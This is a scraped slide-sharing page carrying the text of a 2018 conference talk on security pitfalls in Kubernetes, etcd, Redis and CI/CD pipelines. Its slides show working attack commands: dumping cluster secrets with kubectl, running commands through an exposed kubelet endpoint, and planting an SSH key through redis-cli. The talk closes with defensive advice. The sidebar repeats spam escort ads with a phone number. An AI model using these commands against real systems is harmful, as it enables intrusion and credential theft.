08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 

Recently uploaded (20)

Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 

Security pitfalls in script-able infrastructure pipelines.

  • 1. $ Whoami Jesper Larsson jesper@assured.se - jesper@cure53.de @herrJesper https://www.linkedin.com/in/gustafjesperlarsson I work as a Security Consultant for Assured and Cure53. (it´s complicated) I do security research on embedded systems and infrastructure as well as penetration testing, security reviews, architectural assessments. “Professional provider of opinions” Those are my principles and if you don’t like them… Well I have more… www.assured.se | www.cure53.de
  • 2. Security pitfalls in script-able infrastructure DefCamp - 2018
  • 3. $ Outline for this talk
  • 4. 01. Containers, Orchestrations & Pipelines ”How is this even a talk about security, hold my beer!”.
  • 5. $ Virtual Machines vs Containers Host Operating system Infrastructure Hypervisor Host Operating system Infrastructure Container Engine Guest OS Guest OS Guest OS Bins/Libs Bins/libs Bins/libs App1 App2 App3 Bins/Libs Bins/libs Bins/libs App1 App2 App3
  • 6. $ Containers, Pods, Chroots, and what not
  • 8. $ The Playing field - Orchestrations, Pipelines Secrets Store DevOps Peeps REPO INFRA AS CODE CI / CD Container Orchestration Monitoring Pipeline = Production Environment Commit </>
  • 10. 02. Any security challenges?”How does this even work! Insert a clever quote here “<img src = ”.
  • 12. $ One compromise to rule them all Secrets Store DevOps Peeps REPO INFRA AS CODE CI / CD Container Orchestration Monitoring Pipeline = Production Environment Commit </>
  • 13. $ Attack Surface Managing Secrets Vulnerability management Configuration management Firewalling, ACL, ingress/egress, Network and service segmentation Privilege management, Role based access controls Unprotected endpoints, APIs, Services Repository management Patch management Vulnerable sources Onboarding and offboarding activities Continuous monitoring and auditing Default Credentials Security Settings Know Vulnerabilities Faulty Verifications
  • 14. 03. Fails, Fails, Fails…”Finally time some destruction, chaos and suffering”.
  • 15.
  • 16.
  • 17. UI CLI API Kubernetes Master API Server Scheduler Controller etcd $ Kubernetes infrastructure Image Registry Node 1 Node 2 Node 3 Node 4 Node 1, 2, 3, 4 Docker kubelet kube proxy Flannel Pod Pod Pod Pod Pod Pod Pod Pod Pod Other services Network,DNS,MX,UI Users
  • 18. $ Security Concerns out of the box? A few... API Authentication API Authorization TLS for API traffic Role Base Authentication Cloud metadata API Access Access to kubectl Access to etcd Network ACL Ingress and Egress Encrypt Secrets at rest ACL to Kubelets Container privileges Pod Security policies Controlling capabilities in user runtime and of specific workloads Rotation for infrastructure credentials Restrict access to alpha and beta features Image verification Defense in depth Pod and node separation Monitoring
  • 19. $ How bad was is if a etcd instance was breached?
  • 20. $ etcd instances on the interwebz today
  • 21. $ looking at the etcd service of kubernetes J J J J Lets have a look at the kcf.tar The most epic function! ?recursive=true
  • 22. $ Kubernetes etcd vs internet?
  • 23. $ Kubernetes etcd vs internet?
  • 24. $ Pivoting from pod to cluster administrator curl -sLO "https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl && chmod +x kubectl && mv kubectl /usr/local/bin" kubectl get secrets –all-namespaces –o yaml apiVersion: v1 items: - apiVersion: v1 data: site.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0t…
  • 25. $ Kubelet command injection curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /" curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=env"
  • 26. $ kubectl command injection
  • 27.
  • 28.
  • 29. $ Soo… No one would ever expose their Redis instance?
  • 30. $ Using Redis-Cli to gain a SSH-session
  • 31. $ Using Redis-Cli to gain a SSH-session (echo -e "nn"; cat id_rsa.pub; echo -e "nn") > key.txt “ AAAAB3NzaC1yc2EAAAADAQABAAABAQDMw97+kkv6cNlsPZDxQ/Dkxp7b7bfyj/SyvwyMmhEPe3u6TTcxh AINyKM+FrOVMfCYxI95RecR8RtoUdHf8CcmaCJ7k8VMCSbyRe7bljpQx4T[...] “
  • 32. $ Using Redis-Cli to gain a SSH-session cat key.txt | redis-cli –h 172.16.10.132 –x set woop OK redis-cli –h 172.16.10.132 172.16.10.132:6379> config set dir /Users/jeslar/.ssh/ OK 172.16.10.132:6379> config get dir 1) “dir” 2) ”/Users/jeslar/.ssh” 172.16.10.132:6379> config set dbfilename “authorized_keys” OK 172.16.10.132:6379> save OK
  • 33. $ Using Redis-Cli to gain a SSH-session
  • 34. • Ensure that that critical security features are enabled and configured correctly • Use authentication and authorization for all API access. Especially management API • Adopt the security model of least privileged • Mange secrets • Separate cluster for dev/test and production • Account management, VPCs, Repos • Zero-trust networking • Access controls • Security audits $ Takeaways
  • 36. Shameless plug time! www.securityfest.com May 23rd-24th 2019 Gothenburg, Sweden